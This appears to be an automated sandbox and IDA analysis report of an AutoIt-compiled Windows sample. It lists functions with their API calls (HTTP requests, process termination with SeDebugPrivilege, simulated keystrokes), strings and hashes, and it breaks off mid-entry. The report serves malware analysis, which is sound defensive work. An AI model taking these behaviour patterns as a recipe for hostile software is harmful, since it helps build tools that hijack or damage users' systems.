FreeLibrary.KERNEL32(?), ref: 0020251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0020254B

Strings

close all, xrefs: 001C1454

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 5c9addddfd5da66896ef35acf53427c4d95c749817ef1d47ed9e8d82b57ecf34
Instruction ID: 207df48c45647858258c9c54c193fa45dc1a61727521d27929e514cc80377a3b
Opcode Fuzzy Hash: 5c9addddfd5da66896ef35acf53427c4d95c749817ef1d47ed9e8d82b57ecf34
Instruction Fuzzy Hash: BBD16931611212DFCB19EF14C899F29F7A4BF25700F65429EE84A6B292DB30ED26CF54

Function 00237DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00237FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00237FC1
GetFileAttributesW.KERNEL32(?), ref: 00237FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00238005
SetCurrentDirectoryW.KERNEL32(?), ref: 00238017
SetCurrentDirectoryW.KERNEL32(?), ref: 00238060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002380B0

Strings

*.*, xrefs: 00238066

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 987fed8732fbc759b8011f686de87b218a5d0fdae8116fa06f435b354761fb1d
Instruction ID: 0f5542ecbde2b87f9e9298cb5415e4189a0ec47794b7dcc6ddde508dcbc50d40
Opcode Fuzzy Hash: 987fed8732fbc759b8011f686de87b218a5d0fdae8116fa06f435b354761fb1d
Instruction Fuzzy Hash: ED81A0F15283469BCB34EF14C884AAEB3E8BF98310F14486EF885D7250EB74DD558B52

Function 001C5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 001C5C7A

Part of subcall function 001C5D0A: GetClientRect.USER32(?,?), ref: 001C5D30
Part of subcall function 001C5D0A: GetWindowRect.USER32(?,?), ref: 001C5D71
Part of subcall function 001C5D0A: ScreenToClient.USER32(?,?), ref: 001C5D99

GetDC.USER32 ref: 002046F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00204708
SelectObject.GDI32(00000000,00000000), ref: 00204716
SelectObject.GDI32(00000000,00000000), ref: 0020472B
ReleaseDC.USER32(?,00000000), ref: 00204733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002047C4

Strings

U, xrefs: 00204693

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: b7bf219481b2c988bbeb19652edab52b9063fac03e689687ef0d9d8592bbbb38
Instruction ID: 43d5c7bdf4ee42429d804a88e5f5b2d4b106417dc8048ba6a688b2ac1cc26e5c
Opcode Fuzzy Hash: b7bf219481b2c988bbeb19652edab52b9063fac03e689687ef0d9d8592bbbb38
Instruction Fuzzy Hash: EE710070410306DFCF21AF64C984EBA7BBAFF4A320F148269EE555A1A6D331D8A1DF50

Function 0023359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002335E4

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

LoadStringW.USER32(00292390,?,00000FFF,?), ref: 0023360A

Strings

^ ERROR, xrefs: 002336C9
Line %d (File "%s"):, xrefs: 0023366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00233724
Error: , xrefs: 002336EF
"%s" (%d) : ==> %s:, xrefs: 00233742

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: de7572f7065d769646e0024d4aef3edd52bbc6eb9e7974eba8eb55b144ac0aee
Instruction ID: cd79487440c228f0df5716577c79db5de6dad7371ff23227144ea52393dbbe33
Opcode Fuzzy Hash: de7572f7065d769646e0024d4aef3edd52bbc6eb9e7974eba8eb55b144ac0aee
Instruction Fuzzy Hash: 60518FB191020ABADF15EBE0EC46EEDBB78AF24300F144169F115721A1EB315BA8DF64

Function 0023C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0023C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0023C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0023C2CA
GetLastError.KERNEL32 ref: 0023C322
SetEvent.KERNEL32(?), ref: 0023C336
InternetCloseHandle.WININET(00000000), ref: 0023C341

Strings

, xrefs: 0023C2BB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 8b37d86808da78add987d0bc43f2555533712951e587ea0e53fb03e4f487896c
Instruction ID: 8e29ffbd2792e62f63ebd087910a93348e82949efba251a3dfbeb37ea3a58fda
Opcode Fuzzy Hash: 8b37d86808da78add987d0bc43f2555533712951e587ea0e53fb03e4f487896c
Instruction Fuzzy Hash: E6317AB1620709AFD7219FA4DC88AAB7BFCEB49744F24851EF446E3200EB30DD159B65

Function 0022989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00203AAF,?,?,Bad directive syntax error,0025CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002298BC
LoadStringW.USER32(00000000,?,00203AAF,?), ref: 002298C3

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00229987

Strings

Line %d (File "%s"):, xrefs: 0022992D
Line %d:, xrefs: 00229912
., xrefs: 0022996D
Error: , xrefs: 00229955
%s (%d) : ==> %s.: %s %s, xrefs: 002298F1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 2c4d4de412f64302689b956dfa5f587b8436dfb4468013b19d1cc2dbf87d843b
Instruction ID: e6a51935c071fe75deac80c3aee0d92b4ed18c6c6b84adb0c62ac590ed9bc3e0
Opcode Fuzzy Hash: 2c4d4de412f64302689b956dfa5f587b8436dfb4468013b19d1cc2dbf87d843b
Instruction Fuzzy Hash: EF217C3191031ABBCF11AF90DC0AEEE7739BF29701F04446AF515660A2EB719668DB10

Function 0022209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002220AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002220C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0022214D

Strings

details, xrefs: 002220FB
list, xrefs: 0022212F
smallicons, xrefs: 00222115
largeicons, xrefs: 002220E1
SHELLDLL_DefView, xrefs: 002220CC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: e097cfc42e63698176c345abeb6654e03f633eae63bf7103acf7838b2209cd3c
Instruction ID: cec73b497c572078437eee61b116831a7ed9cb9305def1d62593f748f2dfdbd7
Opcode Fuzzy Hash: e097cfc42e63698176c345abeb6654e03f633eae63bf7103acf7838b2209cd3c
Instruction Fuzzy Hash: 7D112B7A5A8737FAF6012660BC06DEA379CCF25734B200025F709A50D2FFA258355618

Function 001FCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001FCEB7
_free.LIBCMT ref: 001FCF22
_free.LIBCMT ref: 001FCF48
_free.LIBCMT ref: 001FCF71
_free.LIBCMT ref: 001FCFA9
_free.LIBCMT ref: 001FCFDA
_free.LIBCMT ref: 001FD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 001FD09C
_free.LIBCMT ref: 001FD0B5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: a758113c20cb95315a78a2f5097acdef67a889f4a01c3f49fbad6621a4354c16
Instruction ID: c88844b230d3df20c449772850790b0872b030d02031c2ec2b584e529b38bd6f
Opcode Fuzzy Hash: a758113c20cb95315a78a2f5097acdef67a889f4a01c3f49fbad6621a4354c16
Instruction Fuzzy Hash: 3C616A7190471DAFDB21AFB4A985A7EBBA6EF11310F04016EFB0197281DB319D0197E0

Function 002550D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00255186
ShowWindow.USER32(?,00000000), ref: 002551C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 002551CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 002551D1

Part of subcall function 00256FBA: DeleteObject.GDI32(00000000), ref: 00256FE6

GetWindowLongW.USER32(?,000000F0), ref: 0025520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0025521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0025524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00255287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00255296

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 7b73626dc9621299d51515adbaf4b50ef99845ec1a4b09b607d88b1e366b16e2
Instruction ID: 6d713d96890492d6c8262f9f50b9b9fd57f67cc335e3757f12b189e83322c598
Opcode Fuzzy Hash: 7b73626dc9621299d51515adbaf4b50ef99845ec1a4b09b607d88b1e366b16e2
Instruction Fuzzy Hash: 6F51CA30A70A29BEEF249F24CC59BD83B65EB05323F148011FD19D66E0C7B59968DF49

Function 001D8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00216890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002168A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002168B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002168D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002168F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00216901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0021691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D8874,00000000,00000000,00000000,000000FF,00000000), ref: 0021692D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: b3c49f249685a304cb303ee94a239b993b996ca3d72bb3ac1100a6c23f413d79
Instruction ID: ae293056048a17b3ab475bb1e41fc1b7300243d6908cbdf304fd0560415da1d7
Opcode Fuzzy Hash: b3c49f249685a304cb303ee94a239b993b996ca3d72bb3ac1100a6c23f413d79
Instruction Fuzzy Hash: D451BB7061030AEFDB24CF25DC99FAA7BB5FB58311F10451AF912972A0EB70E9A0DB50

Function 0023C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0023C182
GetLastError.KERNEL32 ref: 0023C195
SetEvent.KERNEL32(?), ref: 0023C1A9

Part of subcall function 0023C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0023C272
Part of subcall function 0023C253: GetLastError.KERNEL32 ref: 0023C322
Part of subcall function 0023C253: SetEvent.KERNEL32(?), ref: 0023C336
Part of subcall function 0023C253: InternetCloseHandle.WININET(00000000), ref: 0023C341

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 2fb6ef46abe919d695ef36cb96c36c219efa10268d657d391a73a80582d88846
Instruction ID: 9a011a501cad8e7762f37a429b4ae8cddc3626bcd513ac2cc8966c2ded2e310d
Opcode Fuzzy Hash: 2fb6ef46abe919d695ef36cb96c36c219efa10268d657d391a73a80582d88846
Instruction Fuzzy Hash: 6C3183B1220705AFDB219FA5DC48A67BBF8FF58301F20441DF95696610D730E824DF60

Function 002225A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00223A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00223A57
Part of subcall function 00223A3D: GetCurrentThreadId.KERNEL32 ref: 00223A5E
Part of subcall function 00223A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002225B3), ref: 00223A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002225BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002225DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002225DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002225E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00222601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00222605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0022260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00222623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00222627

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 8e89ba7497f1be6daa77a4b1cbc01d3d5001a36f4b70d0ffa63bdfbcc4f5c83c
Instruction ID: fa4ca01893e5b70ee03ad09ee3b6b5976665c7f54ea39a1f56e46176487e1297
Opcode Fuzzy Hash: 8e89ba7497f1be6daa77a4b1cbc01d3d5001a36f4b70d0ffa63bdfbcc4f5c83c
Instruction Fuzzy Hash: A301D831790720BBFB106768AC8EF593F9DDB4EB12F604011F318AE1D1C9F214548A6D

Function 00221803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00221449,?,?,00000000), ref: 0022180C
HeapAlloc.KERNEL32(00000000,?,00221449,?,?,00000000), ref: 00221813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00221449,?,?,00000000), ref: 00221828
GetCurrentProcess.KERNEL32(?,00000000,?,00221449,?,?,00000000), ref: 00221830
DuplicateHandle.KERNEL32(00000000,?,00221449,?,?,00000000), ref: 00221833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00221449,?,?,00000000), ref: 00221843
GetCurrentProcess.KERNEL32(00221449,00000000,?,00221449,?,?,00000000), ref: 0022184B
DuplicateHandle.KERNEL32(00000000,?,00221449,?,?,00000000), ref: 0022184E
CreateThread.KERNEL32(00000000,00000000,00221874,00000000,00000000,00000000), ref: 00221868

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 06f0bc6015575b20002b08cb506ccaccab48ff19510d6a6606dd4f566400aac2
Instruction ID: 86b6889d2848cc8d33d9f7898be34c6b7370a2ae55742d5aef2f1694855995e6
Opcode Fuzzy Hash: 06f0bc6015575b20002b08cb506ccaccab48ff19510d6a6606dd4f566400aac2
Instruction Fuzzy Hash: E701CDB5640708BFE710AFB5EC4DF6B3BACEB89B11F108451FA05DB1A1DA709850CB24

Function 0024A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0022D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0022D501
Part of subcall function 0022D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0022D50F
Part of subcall function 0022D4DC: CloseHandle.KERNEL32(00000000), ref: 0022D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0024A16D
GetLastError.KERNEL32 ref: 0024A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0024A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0024A268
GetLastError.KERNEL32(00000000), ref: 0024A273
CloseHandle.KERNEL32(00000000), ref: 0024A2C4

Strings

SeDebugPrivilege, xrefs: 0024A18F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 69b4fd78cf519df254a531924a4f813d1b525a9911095d850433ff2fac932948
Instruction ID: b396edb2d405fecae3ff5ef57f373a3df6f093349d263a46f299968c24f2ea34
Opcode Fuzzy Hash: 69b4fd78cf519df254a531924a4f813d1b525a9911095d850433ff2fac932948
Instruction Fuzzy Hash: 9D61B130254342AFD724DF18D494F1ABBE1AF54318F14848CE86A8B7A3C7B2ED55CB92

Function 00253886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00253925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0025393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00253954
_wcslen.LIBCMT ref: 00253999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002539C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002539F4

Strings

SysListView32, xrefs: 002538F7

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 2517a8e347f1ba2ad98e63a9398f0eaacf8fec7191b3458a61c8d93302df2fc7
Instruction ID: 6dbe452cebf690eb75187d5f290542f76bd576af6dc1a5fabc7deafe9e6e131a
Opcode Fuzzy Hash: 2517a8e347f1ba2ad98e63a9398f0eaacf8fec7191b3458a61c8d93302df2fc7
Instruction Fuzzy Hash: 1441D571A10309ABEF21DF64CC49BEA77A9EF08391F101526F948E7281D770DEA4CB94

Function 0022BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

